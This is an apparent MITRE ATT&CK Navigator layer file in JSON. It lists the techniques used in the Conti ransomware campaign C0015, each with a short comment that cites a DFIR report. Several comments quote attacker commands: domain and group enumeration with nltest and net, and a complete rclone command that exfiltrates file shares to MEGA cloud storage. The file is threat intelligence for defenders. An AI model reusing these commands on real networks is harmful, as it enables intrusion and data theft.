{"description": "Enterprise techniques used by C0015, ATT&CK campaign C0015 (v1.0)", "name": "C0015 (C0015)", "domain": "enterprise-attack", "versions": {"layer": "4.5", "attack": "19", "navigator": "5.3.2"}, "techniques": [{"techniqueID": "T1059", "showSubtechniques": true}, {"techniqueID": "T1059.003", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `cmd.exe` to execute commands and run malicious binaries.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059.005", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059.007", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1486", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Conti](https://attack.mitre.org/software/S0575) ransomware to encrypt a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1005", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained files and data from the compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1039", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors collected files from network shared drives prior to network encryption.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1074", "showSubtechniques": true}, {"techniqueID": "T1074.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), PowerView's file share enumeration results were stored in the file `c:\\ProgramData\\found_shares.txt`.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1030", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors limited [Rclone](https://attack.mitre.org/software/S1040)'s bandwidth setting during exfiltration.(Citation: DFIR Conti Bazar Nov 2021) ", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1482", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1567", "showSubtechniques": true}, {"techniqueID": "T1567.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the [Rclone](https://attack.mitre.org/software/S1040) command `rclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1083", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1105", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors downloaded additional tools and files onto a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1570", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used WMI to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto additional hosts within a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1036", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1135", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors executed the PowerView ShareFinder module to identify open shares.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1027", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used Base64-encoded strings.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1588", "showSubtechniques": true}, {"techniqueID": "T1588.001", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Cobalt Strike](https://attack.mitre.org/software/S0154) and [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: DFIR Conti Bazar Nov 2021) ", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1588.002", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained a variety of tools, including [AdFind](https://attack.mitre.org/software/S0552),  AnyDesk, and Process Hacker.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1069", "showSubtechniques": true}, {"techniqueID": "T1069.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net localgroup \"adminstrator\" ` to identify accounts with local administrator rights.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1069.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors use the command `net group \"domain admins\" /dom` to enumerate domain groups.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1566", "showSubtechniques": true}, {"techniqueID": "T1566.001", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1057", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1055", "showSubtechniques": true}, {"techniqueID": "T1055.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.(Citation: DFIR Conti Bazar Nov 2021) ", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1219", "showSubtechniques": true}, {"techniqueID": "T1219.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors installed the AnyDesk remote desktop application onto the compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1021", "showSubtechniques": true}, {"techniqueID": "T1021.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used RDP to access specific network hosts of interest.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1018", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1553", "showSubtechniques": true}, {"techniqueID": "T1553.002", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used DLL files that had invalid certificates.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1218", "showSubtechniques": true}, {"techniqueID": "T1218.005", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1218.010", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors employed code that used `regsvr32` for execution.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1218.011", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors loaded DLLs via `rundll32` using the `svchost` process.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1016", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.(Citation: DFIR Conti Bazar Nov 2021) ", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1124", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net view /all time` to gather the local time of a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1204", "showSubtechniques": true}, {"techniqueID": "T1204.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors relied on users to enable macros within a malicious Microsoft Word document.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1047", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `wmic` and `rundll32` to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto a target host.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}], "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": 1}, "legendItems": [{"label": "used by C0015", "color": "#66b1ff"}]}